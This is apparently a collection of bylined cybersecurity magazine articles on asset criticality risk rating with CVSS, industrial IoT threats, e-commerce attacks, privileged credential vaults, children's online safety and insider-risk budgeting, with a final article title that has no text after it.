Summary This paper shares the details on limitations of existing asset management solutions for Cybersecurity needs and how to enhance the capability of existing asset management solutions that would meet enterprise cybersecurity risk needs. Uncover high risk and vulnerable assets to CISOs and senior management with data driven automation on near real time basis.

Highlights the gap in the current asset management solutions and the critical role of Asset management solution provides in secure enterprise from advance threats and cyber security risk management. Importance of asset management in identifying asset criticality rating or static risk, inherent risk and residual risk.

Cybersecurity risk not only help uncover the critical risky assets but also helps drive the enterprise priorities and future enhancements & investment on security technologies

Introduction IT Asset management solutions helps discovers and provide visibility into the assets with regards to every IP connected device in enterprise environment. Accurate asset discovery and visibility is one of the critical needs to secure the asset. What you see is what you protect. Leading research shows that on average companies are blind to 40% of the devices in their environment. As a result, businesses do not have a real-time, comprehensive view of all the assets in their environment—or know the risks associated with them.

Assets can be broadly divided into following categories: - Endpoint User Devices (Managed Assets & Unmanaged Assets) - Production and Non-Production Network Infrastructure devices - Enterprise IoT devices (Camera, Printers, Smart TVs, HVAC Systems, Industrial Robots, Medical Devices, Physical Security Access etc.)

ISO 27001 - Information Security Management System (ISMS) certifications requires enterprise to identify information assets in scope for the management system and define appropriate protection responsibilities. NIST and CIS Critical Security Controls also include asset inventory management as part of critical infrastructure security.

IT Asset inventory management is the basic need of an enterprise and urgency of discovery and visibility is not critical, whereas enterprise security primarily rely on accurate and detailed assets visibility on near- real time basis.

Majority of the enterprise assets are distributed across many different geos, networks such as private network, public cloud. With remote work universally acceptable, the near-real time asset visibility and management becomes even more critical.

Traditional Asset Management Usually, there Asset management solutions in the market. Agent based on Network scan based and both of them plays a critical role in providing Assets visibility.

Network Scan based Asset Discovery: Network Scan based solutions helps identify / discovery devices on the network, the limitations are that network scan must be reachable to all networks, VLANs, subnets in the entire enterprise. Network based scans are limited to the details discovered over the network.

Agent based Asset discovery: Agent based solution provides info about the OS and core OS services, versions, Middleware services, patches etc.

Traditional asset management solutions also referred as CMDB (Configuration Management Database) are required to meet the IT inventory & asset management need such as asset ownership, cost center, supporting patch management needs. These solutions were not designed to keep cybersecurity threats and cybersecurity risk management in focus.

Cybersecurity Dependency on Asset Management Before we get into the details on Cybersecurity dependency, it is important to understand definition of an asset. Generally, asset is defined as an IP connected device, this usually works fine but has challenging in managing serverless assets. An application consists of group an assets.

The exponential increase in the number of assets be it a mobile device or microservices based light weight servers, self-mutating server and serverless assets has made the near real-time asset management even more critical. The assets distributed over many networks and geos and private and public networks. The next generation asset management will be supporting the following capabilities:

- Provides asset context with regards to network placement & external visibility - Binding between assets and applications or micro-services running on the assets - Provides asset criticality risk rating - Status of security agents on the assets - Status of SIEM integration for OS level and application-level logs - Correlating each asset with all the known security vulnerabilities either related to OS or application or identity & access management or firewall

- Mapping sensitive data assets (such as PII, PAI or PHR) with each of the servers - Continuously track assets against enterprise security compliance

Since 2019, OWASP has been also reporting Improper Assets Management as one of the top ten API Security vulnerabilities across the industry.

Automate Asset Criticality Risk Rating Asset Criticality is the most important factor in understanding the risk of an asset being compromised. The asset criticality rating provides the view on the asset risk without any known security vulnerability. Any asset in production and non-production environment introduces risk and the risk is related to the type of data asset that assets process or handles, exposure of an asset to outside world and how an unavailability of assets impacts the business and enterprise services. We can also call this static risk that means minimum risk that this asset introduces to the enterprise.

None of the traditional asset management solutions offers Asset Criticality Risk Rating, hence many enterprises rely on generating this asset criticality rating using non-standard and adhoc techniques.

Asset Criticality Risk Rating What would be impact on enterprise if an asset is unavailable, tampered or breached.

Critical assets are those that are essential for supporting the critical enterprise business needs. These assets will have a high consequence of failure, and it must be ensured that such assets of failure are avoided. These assets should be identified on urgent basis and more focus should be paid to these assets.

Every organization has a way to identify which applications are critical, which is fairly easy but the challenges are mapping each and every asset to these critical applications and doing it consistently on real time basis.

Building an Asset Criticality Rating Asset Criticality Risk Rating (ACRR) is foundation of determining Asset Risk. Some of the important aspect of building ACRR are following: - It must be fully automated and not dependent on user input - Provides consistent ACRR and in near real time - Provides options for Risk analyst to update the weightage of ACRR

ACRR Calculation Approach In the proposed section, we share details on how CVSS (Common Vulnerability Scoring System) can be used for build ACRR. CVSS is an open framework providing characteristics and severity of software vulnerabilities. CVSS consists of three metric groups: Base, Temporal, and Environmental.

Our interest is in the Base CVSS. The Base CVSS represents the intrinsic qualities of a vulnerability that are constant over time and across user environments and composed of two sets of metrics: Exploitability metrics and Impact metrics.

Exploitability Metrics Impact Metrics

Attack Vector Confidentiality Impact Attack Complexity Integrity Impact Privileges Required Availability Impact User Interaction

Scope

For ACRR, we only need Impact Metrics, and we will then find an average Impact for Confidentiality, Integrity and Availability across all the key attributes required for generating ACRR.

ACRR Formula The ACRR is based on the CVSS standard used for security vulnerability rating. We extend the same the same model to measure the criticality of an application. We will be using the following formula

ACRR= f(Confidentiality, Integrity, Availability)

Ci = Average weight of all the Confidentiality Impact for the asset Ii = Average weight of all the Integrity Impact for the asset Ai = Average weight of all the Availability Impact for the asset ISS = Impact Sub-Score

ISS = (1 -((1-Ci)*(1-Ii)*(1-Ai))) ACRR = roundup (min (ISS * 8, 10))

The min() function returns the item with the lowest value of the items The roundup roundup to zero decimal We derived the constant 8 based on iterating with number assets that provide the acceptable risk rating score and following Delphi method.

Mathematical Ranges Ci = [0,1] , Ii = [0,1] , Ai = [0,1] ACRR = [0 , 10.0]

ACRR Rating Scale

All the ACRR scores will be mapped to a qualitative rating and we will be in line with the industry standard CVSS rating scale;

Rating ACRR Score

None 0.0

Low 0.1 to 3.9

Medium 4.0 to 6.9

High 7.0 to 8.9

Critical 9.0 to 10.0

ACRR Worksheet We are going to use the following key indicators for our worksheet to demonstrate generate ACRR for a given asset.

Key Indicator Descriptions Possible options Sensitive Data Handling The type of data asset This could Personally applications or server is Identifiable Information (PII), processing. PCI Card Data (PCD), Personal Health Information (PHI) etc Application Exposure This represents application Public Internet, Partner exposure to type of users and Network, Internet Network network. Service Tier A service tier is indicating how It could be Tier-0, Tier-1, Tier- critical a service is to the 2 and Tier-3. Whereas T0 – operation of your business which is critical service to T3- from availability point of view. Which is non-essential

Sensitive Data Volume Volume of data processed by It could be block of 100K or the application or the servers 10K based on business risk. involved in that applications. Number of External users Number of active external 1million – 10million users of the applications and will also apply to all the servers involved.

Development Model This indicated if the Internally Developed, Application was developed by Externally Developed, Hybrid, internal development team or 3rd Party Product developed using out souring model or mixed Hosting Environment This indicates the asset Public IaaS, PaaS or hosting environment. Kubernetes, SaaS, Private Data Center

Additional key indicators could be used based on risks and threats related to Hosting Environment, Number of Admin users etc.

In next section, we will generate ACRR for a given asset, we are going to use following key indicators that helps identify the impact. For each of these key indicators, we are going to assign weightage for Confidentiality, Integrity and Availability. The weightage is assigned based on the risk / impact that will caused if the asset involved gets compromised. The weightage must be assigned between 0 and 1. The lower weight is for low impact and higher weight is for high impact.

Key Indicator Indicator Value Confidentiality Integrity Availability Impact Impact Impact Sensitive Data PCD & PII 0.7 0.7 Not applicable Handling Application Exposure Public Internet Not applicable Not 0.9 applicable Service Tier Tier-0 Not applicable Not 0.9 applicable Sensitive Data Volume 1million – 5million 0.8 0.8 Not applicable Number of external 100k-1m Not applicable Not 0.7 users applicable Development Model Internally 0.2 0.2 Not applicable Developed Hosting Model Public IaaS 0.6 0.6 Not applicable

In essence, ACRR determines the impact the business is going to suffer if the asset in question were to be compromised.

Ci = (0.7+0.8+0.2+0.6)/4 = 2.3/4 = 0.6

Ii = (0.7+0.8+0.2+0.6)/4 = 2.3/4 = 0.6

Ai = (0.9+0.9+0.7)/3 = 2.3/3 = 0.8

Ci, Li, Ai are rounded off to 1 decimal.

ISS = 1 -((1-0.6)*(1-0.6)*(1-0.8)) ACRR = roundup(min(ISS * 8 , 10))

The Asset Criticality Risk Rating is High.

Enhance CyberSecurity Risk The goal of the asset management solution is to provide the asset attributes or key indicators collected using agent and or network-based scans and on consistent basis. The ACRR data does not change often but is critical for providing cybersecurity risk.

Inherent Risk: As we know there are no perfect assets or applications. Any applications or servers on an average will have 40-75 known issues that includes vulnerabilities from Network & Infrastructure, open-source library, application security vulnerabilities from SAST, DAST etc. The inherent risk hugely depends on static risk i.e., ACRR, so it is very important to get the ACRR right on consistent basis and through automation. Inherent risk can be derived using CVSS methodologies as well and the challenge will be average out the exploit and impact across all the known vulnerabilities. Inherent must be done on daily basis and only a good automation mechanism with asset management and vulnerability correlation can provide this data.

Residual Risk: Residual risk is what the CISOs are looking for to get an idea on how effective Cybersecurity investment has been and how are they protecting the known issues that cannot be fixed due to number of limitations. Residual Risk is the risk score after taking consideration of all the security counter measure and exploit prevention solution in place. Residual risk are the real threat and risk to the enterprise.

About the Author

Gyan Prakash is a Head of Information Security at Altimetrik. Before joining Altimetrik, Gyan was Global Head of Application Security & Security Engineering at Visa from 2016-2020. He managed Product Security Architecture and Engineering, Application Security & vulnerability management. Gyan also led Future of Payment and Blockchain / Crypto Currency research at Visa from 2014-2016. Gyan has 20+ years of experience in security technologies. He has implemented mature DevSecOps at Visa and has been consulting with Fortune 500 organizations working to implement DevSecOps at scale. Gyan is a technologist and innovator at heart, with 250 global patents including 152 granted in the areas of system security, mobile security, tokenization, and blockchain. LinkedIn: https://www.linkedin.com/in/gyan-prakash-747a8a2/ Altimetrik Corp: https://www.altimetrik.com/

The Rising Tide of Security Threats in The Industrial Internet of Things By Don Schleede, Information Security Officer at Digi International

Throughout Cyber Security Awareness Month in October, many organizations shared their thoughts on the state of cybersecurity and reflected on the processes and steps that can improve it. However, the discussion largely focused on protecting end users rather than building security into networks and devices from a systemic perspective. In addition, through its theme of “If You Connect It, Protect It,” however, Cybersecurity Awareness Month has also opened the door to conversations about IoT cybersecurity.

Most IoT discussions focus on consumer IoT – the smart trend-of-the-moment. That’s not surprising since consumer-centric applications and devices are increasingly visible in everyday life and provide that “living in the future” feeling that grabs attention. However, industrial and enterprise IoT applications have just as many implications – though perhaps slightly less visibly, which means they receive far less attention and are less understood. It’s easier to assume that industrial IoT is more secure than its consumer counterparts, since those applications are backed by large organizations facing greater security risks. However, that’s a mistaken notion: The industrial IoT’s struggle with security remains a challenge that is largely unaddressed.

Understanding the Industrial IoT

When we talk about IoT, we tend to think of devices and connected “things” – smart TVs, home security systems, self-driving cars, to name a few. We rarely consider the resources these “things” rely on or the networks that connect them. Yet these systems are underpinned by hundreds – perhaps thousands – of connected devices that, when compromised, can have far-reaching consequences.

To talk about industrial IoT security, we must first understand the types of disruptive security threats:

• Confidentiality threats – These intrusions expose sensitive or confidential information, including the viewing of data in the actual device or the theft/cloning of device firmware itself. • Theft of service – Authentication weaknesses or failures create critical vulnerabilities. Upgrade features, unlocked without authorization, are also an important threat. • Data integrity threats – Unauthorized messages are introduced into a network, or an unauthorized party takes control of a device. • Availability threats – Denial-of-service (DOS) attacks prevent the device from sending messages by flooding it with hostile traffic.

All of these disruptions can arise through different methods, from reverse engineering, micro-probing a chip, or exploiting unintentional security vulnerabilities within a code to exploiting weaknesses in internet protocols or crypto or key handling. No matter the source, one thing is clear: We need to know where to improve security and how to close those gaps.

Building security from the ground up

Our analysis of active devices found that 43% of IIoT devices communicate insecurely. That’s certainly far better than consumer IoT devices (98% of which are unsecured), but the reality is that the number is still far too high, and the potential repercussions of these lax protocols are serious. From manufacturing, transportation, and utilities to healthcare and other industries, organizations must adopt key strategies to prevent and mitigate security issues:

• Security-by-Design: Vendors and customers repeatedly choose lower costs and faster go-to- market options instead of investing the necessary time and effort to design and build top-level security into their devices and applications. As vulnerabilities and attacks continue, organizations are – at last – beginning to factor in the risks (think: liabilities and compliance issues) caused by faulty security settings and inadequate encryption/privacy protection. Security is also gaining importance over the long run because it reduces the costs of potential breaches. • Device Authentication and Identity: Passwords remain one of the most common forms of authentication – and one of the most common ways threat actors penetrate systems. Many organizations are opting for multi-factor authentication (MFA) that adds a second layer of access protection by requiring additional forms of authentication. From location-based options such as an IP address to something the user physically possesses like a phone or a key fob, MFA offers flexible controls for easier management and a smoother and faster user experience, while improving overall security even for physically dispersed devices.

• Updates and Upgrades: IIoT devices have much longer longevity than consumer IoT devices – as much as 10-15 years. Updating and upgrading the firmware and software for each device becomes increasingly challenging as the volume of devices in the field rises. An organization cannot just deploy thousands of devices. It must manage them throughout that lengthy lifecycle. IIoT leaders can offer centralized device management solutions to help administrators manage updates and patches, troubleshoot through out-of-band-management, reconfigure devices, and monitor the health of the entire network. This holistic approach provides insight when a specific device is at risk and helps them mitigate issues before they worsen. • Risk Assessments and IoT Regulations: As we move into 2021, the number of IIoT devices will continue to grow, requiring organizations to assess both devices and networks. For security professionals, this is already a best practice for all deployments. However, soon it will be the standard thanks to guidelines within the NIST’s IoT security framework, legislative and industry regulations, and other mandates. This is a move in the right direction and a long-overdue step since large swaths of the IoT remain vulnerable today.

Awareness, Understanding, and Action

Embedded security is a critical requirement for a growing number of connected IoT applications and devices, especially as threats continue to rise. Although, we continue to play catch-up with threat actors, we are seeing a gradual shift in the right direction. More leaders understand the need to improve security, and new regulations have identified and highlighted a problem that has been lurking for years. It is time for IoT vendors, developers, admins, and engineers to make security a top priority.

About the Author

Don Schleede is the Information Security Officer for Digi International, a Minnesota-based manufacturer of embedded systems, as well as routers, gateways, and other communications devices for the Industrial IoT. He has 27 years of experience in high-tech security and has been with Digi for more than seven years. Earlier, Don held positions as a developer, IT Operations Director, and IT Architect. Don can be reached online at (EMAIL, TWITTER, etc..) and at our company website http://www.mycompany.com/

E-Merchants: Secure Your Online Sales from Cybersecurity Threats By Anthony Webb, EMEA Vice President, A10 Networks

This year, online retailers pushed the boundaries with “Black Friday” deals in the hopes of improving their online sales, thanks to the uncertainty around in-store shopping due to COVID-19, leading many customers to make their purchases from the safety of their own homes. As a result, e-commerce merchants have witnessed a significant uptick in users and devices connecting to websites than in recent years.

Good Cybersecurity is Crucial

The good news for e-tailers is that overall sales are expected to grow in the new year. This has added importance in a year when many e-commerce businesses have faced unprecedented disruption. However, one thing is clear. Online sales will take centre stage.

However, just as online sales are at the forefront, so should cybersecurity. Retailers aren’t the only ones looking to capitalise on the increase in online spending. Shopping seasons offer hackers an opportunity to profit as well. We’ve already seen a huge uptick in cyber-threats due to COVID-19. Now, online shopping provides cyber-criminals with additional motivation to launch their attacks using some of the below tactics:

Phishing – Phishing and its variants, including spear-fishing and whaling, are email-based attacks that leverage social engineering techniques to fool recipients into providing sensitive information to the attacker. While spear-fishing and whaling attacks are more targeted than phishing, all three forms attempt to get the victim to read the email, click on a link, possibly open an attachment, and ultimately disclose valuable personal or corporate information. Ransomware – Ransomware attacks seek to extort money from victims by encrypting access to files or entire systems until they pay the attacker a ransom, have become increasingly popular in recent years. Much of this has to do with the potential to make large sums of money from the ransoms. Another reason for the rise in ransomware attacks is the availability of ransomware-as-a-service (RaaS) kits, which are inexpensive to purchase on the black market, making it easy for novice hackers to launch their own attacks. Phishing emails are the top threat vector to distribute ransomware. Distributed Denial of Service (DDoS) – DDoS attacks are designed to stop a computer, server, website, or service from operating by flooding it with internet traffic generated by an army of bots called a botnet. The tremendous growth in Internet of Things (IoT) devices, many of which are not properly secured, has made it easier for attackers to take control of more devices and create botnets. DDoS attacks can be especially damaging to e-commerce businesses if customers can’t access their websites to make purchases. Malware – Malware attacks take many forms including viruses, worms, spam, spyware, and more. Some malware threats such as spam are more of an annoyance, while others such as viruses and worms can spread across a network infecting systems and negatively impacting their performance and user productivity. Similarly, spyware can slow down systems. However, it can also be used to report sensitive information such as passwords back to the hacker. Injections – Injection attacks such as cross-site scripting and SQL injections are used to exploit vulnerabilities in web applications by injecting malicious code into a program, which then interprets the code and changes the program’s execution. In other words, it gets the application to do something unintended such as alter the behavior of a website or expose confidential data like login credentials to the attacker. E-commerce businesses hit with an injection attack could find their customers redirected to a fake site which illegally harvests customer information.

The Consequences of Poor Cybersecurity

If e-commerce merchants are not prepared to stop malware, DDoS attacks, and other threats, the consequences of a successful attack could be the difference between surviving and ceasing trading. Here’s what businesses could be facing: Lost Revenue – Any downtime to a web server that prevents customers from making a purchase is damaging to online sales and can potentially have a severe impact, especially for smaller organisations. Data Theft – The increase in online shopping during sales periods is a lure for cybercriminals to launch attacks aimed at stealing corporate and customer data. Phishing emails claiming to have information on fake shopping receipts, shipping status, and customer surveys are very popular in the run-up to Christmas. Disruption of Services – DDoS and ransomware attacks can target services that we deem essential. E-commerce sites, public utilities, and schools are just a few examples of their victims. Shutting down access to a service, even for a short period time, can have major financial and social impacts.

Damaged Reputation – Damage can extend beyond short-term financial losses and data theft. Consumer confidence and brand reputation can quickly erode when consumers have a poor online experience. Customers aren’t shy about using social media to express their displeasure. Reduced Productivity – It’s not just customers who feel the impact of a successful attack. If employees can’t access the applications they need to do their jobs, expect to see a drop in productivity with an accompanying rise in undesirable workarounds.

Steps to Take

Cybersecurity is an everyday concern. Fortunately, there are some things that organisations can do to keep applications, networks, and the business safe from threats, especially during peak online shopping periods.

First, look for a solution that provides DDoS detection and mitigation to ensure services are continually available to legitimate users. Hackers have learned how to weaponise IoT devices to launch complex multi-vector and volumetric attacks, capable of bringing down application servers and entire networks.

Second, protect web-based applications with web application firewall (WAF) technology. Outdated applications are especially vulnerable to attacks. A WAF will secure them from hackers looking to exploit HTTP and web application-based flaws.

Third, find solutions that meet current and future platform needs. Organisations may not have transitioned to the cloud yet, but they’ll likely have some cloud-based apps. They must be sure their solution is ready when the company is ready, whether it is moving to a hybrid cloud or multi-cloud infrastructure. And finally, continue to educate employees on the need for good cyber hygiene. According to a 2019 IBM study, 95% of cybersecurity breaches are caused by human error.

With this shift to online a potentially permanent one, e-commerce merchants should expect these sustained levels of activity going forward. Therefore, it’s imperative that e-commerce businesses secure applications, servers, and networks from cyber threats at all times.

About the Author As VP EMEA, Anthony Webb is responsible for managing and growing A10’s sales operations, as well as leading the company’s sales and channel strategy across the region. Before joining A10, he served as vice president EMEA of Ixia Technologies, focusing on maintaining Ixia’s position as the leading provider in network testing while driving their leadership status in network visibility. Prior to joining Ixia, he held positions at the vice president and managing director level for Juniper Networks, running sales organizations across EMEA and in the UK. In 2000, he joined Cisco as sales manager for service provider and enterprise verticals in the UK, before serving as enterprise sales director emerging markets with Cisco in MEA, then collaboration sales director emerging markets. He left Cisco in 2011 to return to the UK. Anthony can be reached online at ([email protected]) and at our company website https://www.a10networks.com/

The Privileged Credential Security Advantage By Tony Goulding, Cybersecurity Evangelist at Centrify

Over time, a causality has emerged that accounts for the majority of security risks for enterprises: privileged accounts lead to data breaches. So much so that the majority of breaches (over 67 percent) in 2020 were caused by credential theft.

Organizations that prioritize privileged credential security have an advantage over their peers by ensuring their operations are more resilient to data breaches. However, there’s a gap that continues to widen between those guarded against a breach and the numerous others that aren’t.

Many have paid attention and embraced the warnings and guidance from analysts, press, and vendors that called for implementing privileged access management (PAM) security controls to mitigate the risk. The question is, did you go far enough?

IT Automation Software and the Attack Surface

As it relates to privileged accounts, the attack surface can be enormous and very diverse. Reducing this attack surface is a primary objective. However, for many organizations, the first – and often, only – focus is on the human administrator and their privileged activities.

Let’s visit another slice of this attack surface that often flies under the radar. Your mileage may vary, but this risk can be just as significant, if not more so. It’s the use of privileged accounts by IT automation software; tools commonly found in IT service management (ITSM), IT operations management (ITOM), and continuous configuration and automation (CCA) platforms, such as asset discovery, vulnerability scanning, and software orchestration.

For example, you may use one tool to scan the network for systems and analyze each one looking for exploits, vulnerabilities, and misconfigurations. And another tool may help you maintain a single system of record for your IT assets by conducting an inventory of each system, feeding results into different tools to show applications, infrastructure, as well as service relationships and dependencies. On top of these, a different tool from a different vendor may be helping you control your IT infrastructure, job scheduling, and inventory management. Like the others, it needs administrative access to IT infrastructure.

In common, they all need to log into IT systems via SSH or WinRM to run commands and scripts with privileges and obtain system-level intelligence.

Therein lies the risk.

Externalizing Credential Management

By default, IT configures these privileged account IDs and passwords statically within the tool. Let’s be clear about what this means. You’re entrusting the keys to every IT system, on-premises and perhaps in the cloud as well, to an application whose core strength is not identity and credential management. Not only that, IT must manually configure dozens or even hundreds of credentials in the tool. Multiply that by the number of tools requiring privileged accounts, and the lights never go off for IT. We haven’t even got to password rotation.

Thankfully, several leading vendors in the space have recognized this. As an alternative, most allow IT to externalize identity and credential management to a third-party solution designed for the job. Relocating credentials to a hardened password vault is the best practice to mitigate this risk. Instead of IT configuring passwords within the tool, the tool fetches them from the vault at scan time. If an attacker compromises the tool, they won’t find any privileged account passwords in its configuration settings, preventing lateral movement to the IT servers and limiting what could amount to a complete compromise of every server in your IT infrastructure, including domain controllers.

Reducing Risk and Adding Value

The value doesn’t end there, however. By now, it’s evident that passwords are inherently weak and introduce risk. IT can use the vault to strengthen passwords and help prevent login denials. Frequent rotation helps mitigate the risk, along with setting long, cryptic passwords. Unfortunately, this falls below

the line of high priorities for many IT shops, resulting in a “set it and forget it” mentality. With the vault, you get automatic account password rotation coupled with password quality of service policies. You avoid the risk of stale passwords with low entropy. No longer must IT manually log into each system to change the local account password, then manually update them in each tool to ensure consistency.

The vault can also help prevent scan failures that occur in-between the scheduled password rotation jobs. Let’s say someone (a well-meaning internal admin or a threat actor) changes a local system password, but an ITOM tool is still using the old one. Subsequently, the login would fail, and you now have gaps in system coverage requiring manual intervention. Some password vaults can automatically reconcile out-of-sync passwords in real-time during password check out to ensure the local system account password and the vaulted password are the same. This client-based password reconciliation feature ensures that your tool will always fetch a valid password from the vault with which to log in at scan time.

Because unauthorized access is a high-reward, low-risk endeavor, hackers will continue to seek out and find new ways of gaining access to high-value and sensitive resources. But embracing a defense in depth strategy by externalizing credential management and gaining insight into incremental risk can go a long way toward mitigating or preventing data breaches -- even if the specific attack vectors are not yet known.

About the Author Tony is a Cybersecurity Evangelist at Centrify. He has over 30 years of security software experience and more than 15 decades of experience in identity and access management & privileged access management. Tony can be reached online on Twitter at @Tony_Centrify and at our company website www.centrify.com

How To Keep Your Children Safe In Remote Learning Situations By Nevin Markwart, Chief Information Security Officer at FutureVault

As parents, we have conflicting feelings on remote learning. One on hand, we want our children to stay healthy, especially in the midst of a public health crisis. On the other hand, online education opens the door to new threats—including opportunities for hackers, risks to our children’s privacy, and increased online harassment.

Fortunately, we as parents can play a proactive role in ensuring that our children’s online education is a safe and fulfilling experience. Here are several easy steps that you can take to protect your children in remote learning situations:

Classroom Learning

Creating an open dialogue with your children’s educators is a simple yet effective way to ensure that everyone is on the same page when it comes to safety and privacy. You should discuss safety protocols

with the school and flag anything that concerns you. Confirm the school has privacy policies in place and learn what they are.

Speak with your children’s teachers and meeting administrators about which screenshare tool they use and confirm that only the school can control screenshare. Learn that program and security features as much as possible.

Make sure the teacher allows students to turn off their cameras after confirming attendance if they’re uncomfortable “going live.” Many adults feel uncomfortable on camera, so imagine how children must feel.

Privacy Parents should have ultimate control over what their children use and see online. Know what platforms your children are using, whether for learning or social media. Maintain direct oversight on whom your children engage with online and limit that circle to known friends, family, and acquaintances. Use Screentime or Parental Controls to restrict the types of online activities your children can do.

You should set up secure passwords for your children to prevent their accounts from getting hacked. Secure passwords are at least twelve characters long, do not include dictionary words, and mix numbers, symbols, and letters (lowercase and uppercase). Turn on your firewall and make sure your children only download files from people or sites you know and trust.

Remember that anything posted online is public, not private information. So, talk to your children about what they’re not allowed to post online. They should never post any sensitive personal information (e.g. social security number, passwords, etc.) on their internet profiles: changing a profile does not delete old copies of it.

Cyberbullying Communication is a key step to prevent cyberbullying. Explain to your children that what happens on the Internet can be permanent and damaging. You should treat people the same way online as you would in person: with respect. This includes not saying anything mean or untrue about someone online. Ask your children’s school what disciplinary measures are in place for online misbehavior.

Report online harassment, including any message that makes your children feel uncomfortable. If the harassment occurred through your children’s remote learning platform, notify their school. You can also report harassment to local law enforcement. Make sure to save and print any records of threatening messages—including screenshots, emails, and texts—for evidence.

About the Author Nevin Markwart, Chief Information Security Officer at FutureVault. Nevin Markwart is the incoming Chief Information Security Office (CISO) for FutureVault Inc., an innovative internet cloud-based personal document storage, access and distribution company.

Initiating his third professional career, Nevin graduated in 2019 with a Master of Science degree in Cybersecurity from Brown University, the Ivey League school located in Providence, Rhode Island. Nevin is an online information privacy expert, having written his graduate thesis paper, “Restricting the Adverse Effects of Internet Terms of Service Agreements,” with the support of his non-faculty academic advisor Tom Ridge, former Governor of Pennsylvania and first US Secretary of the Department of Homeland Security.

Previously, Nevin was the Boston Bruins’ first pick in the 1983 NHL Entry Draft and turned pro immediately after the draft at age 18. He went on to play nine seasons in the NHL, retiring due to the cumulative effects of three shoulder surgeries. After retiring from hockey, Nevin completed his MBA in finance from Northeastern University in Boston in 1994 and began another career in the investment management industry.

Nevin’s investment industry experience includes senior and executive roles in Boston as an equity analyst and portfolio manager, director of research, product manager, and head of Canadian equities for firms including Wellington Management and Fidelity Investments.

Later in his investment management career, Nevin led two Canadian mutual fund companies as CEO: Calgary-based Canoe Financial and Toronto-based Front Street Capital.

Nevin is a member of the Board of Directors of the Business of Hockey Institute (BHI), the Saskatchewan CFA Society, Prairie Green Renewable Energy Inc and Evolution Potash. He is also a business management mentor for the Canadian Consulate’s Canadian Technology Accelerator (CTA) in Boston.

More Internal Security Needed, Less Budget – 10 Tips to Help By Jody Paterson - Founder and Executive Chairman. ERP Maestro

As if internal risks of fraud and data breaches were not high enough, enter in a year of new work environments and economic uncertainty that has also ushered in an even more risk-prone era. Before we even knew the word “COVID,” the frequency of fraud had tripled in the last four years, according to the Ponemon Institute’s 2020 Cost of Insider Threats report. By August of this year, a survey conducted by the Association of Certified Fraud Examiners (ACFE) revealed that 77 percent of responders said they had observed an increase in the overall level of fraud since the pandemic began, with one-third noting that the increase had been significant. The near-term future doesn’t look better. In the same ACFE report, 92 percent expected fraud to increase in 2021. However, fraud isn’t the only concern. Data theft by employees also has risen and research firm Forrester expects to see data breaches caused by insiders to increase by 33 percent in the year ahead.

The cause? More remote work, fear of unemployment and easier ways to access and remove data are the reasons cited. At the same time, companies are reluctant to allocate more money for safeguards, even though the need for improved security is apparent. Yet, we know that leaving risks undetected can end up costing much more than the security solutions designed to prevent them. How, then, can companies get greater protection for business systems while also keeping costs down. The following 10 tips can help.

Establish a Security Control Baseline When developing a strategy and cost-saving budget, start by establishing a security control baseline. A company’s security baseline is the minimum internal security controls needed to keep a system protected and the base objectives that must be met to achieve security goals.

Perform a Risk Assessment Along with creating a security control baseline, determine your current risk level with an analysis of access risks by user, role and business process. This review will provide a deeper comprehension of key areas of risk and how to tackle them as cost-effectively as possible.

Calculate Your Risk Tolerance Along with a risk assessment, a company should know exactly what its risk tolerance is – how much risk it can afford to have. While risk threshold determines how much risk is acceptable before action must be taken, risk tolerance gets into the dollars and cents of what a company can afford if an incident occurs. A company needs to weigh the potential cost of fraud, data breaches and mishaps by employees to determine if it can tolerate that amount of risk and loss.

Decrease Audit Deficiencies Companies meeting audit compliance requirements for Sarbanes-Oxley have to think through the risks and costs of audit deficiencies and material weaknesses and add those to their probability of risks. Reducing risk – even audit risks – to begin with can be the more cost-effective posture to take.

Reduce Risk Remediation Cutting the cost of access risk remediation is another budget-saving strategy. By running a risk analysis more frequently, risks can be found promptly and remediation work can be performed as risks arise rather than accumulating a massive number of risks and creating an overwhelming amount of remediation work all at one time. Such a scenario may slow remediation processes and even let some remediation slide, thereby leaving a company open to a greater risk of damaging incidents.

Eliminate Complexity Manual processes or risk analyses are more complex and harder to perform. Simplify processes as much as possible to reduce errors, time and cost. But also think about more simplicity in whatever technology you use to help control risks. Bear in mind that an intuitive user interface and risk reporting can drive greater adoption and use while reducing training, costs and risk in general.

Leverage Automation Lowering risks, cutting audit deficiencies and reducing remediation work are easier to achieve with automated tools. Organizations can not only save hours and hours of time spent on manual work but also improve accuracy and remediate any risks faster.

Cloud Technology Most companies today realize the value of automation, which can be achieved in both on-premise and cloud technology, but cloud technology can add advantages and savings not possible with on-premise solutions. Cloud technology can come with some significant cost-savings, from no-cost deployments, to an end to continual upgrades and maintenance, to extreme flexibility and long-term agility.

Rank Your Solution Needs One way to be more cost-conscious in security spending is to rank the importance of features in internal security and access control tools. One way to break this down is to think about not only what you need today but also what you might need tomorrow and what features are nice-to-haves versus must-haves. An important caveat here, however, is to not buy any unnecessary bells and whistles. Spending more doesn’t indicate that you have better cybersecurity readiness. Throwing more money at a problem isn’t the best approach. Research firm Gartner points out that a company may spend more money but invest in less-suitable solutions, therefore, inadvertently bloating budgets and making the business more susceptible to risk.

Employee Training It may not be so obvious to include employee training when thinking about maximizing your budget. The truth is, however, that even with taking all of the measures you can with best practices and technology, insider attacks are attributed to employees of every rank. An all-inclusive security program should make training on internal risks, as well as external cyber threats, a priority. In conclusion, cutting costs for internal security shouldn’t mean cutting necessary security solutions or not investing in new or better tools. There are ways using the tips above, however, to keep costs at a minimum while getting better risk protection.

About the Author Jody Paterson is a trusted governance, risk and compliance advisor and thought leader who is a Certified Information Security Specialist (CISSP), a Certified Information Security Auditor (CISA), a former KPMG director, and Chairman and Founder of ERP Maestro.

Jody can be reached online at [email protected], on LinkedIn at https://www.linkedin.com/in/jodypaterson/ and via our company website http://www.erpmaestro.com

Personal Data Breaches for GDPR Compliance: Everything You Need to Know By Dan May, Commercial Director, ramsac

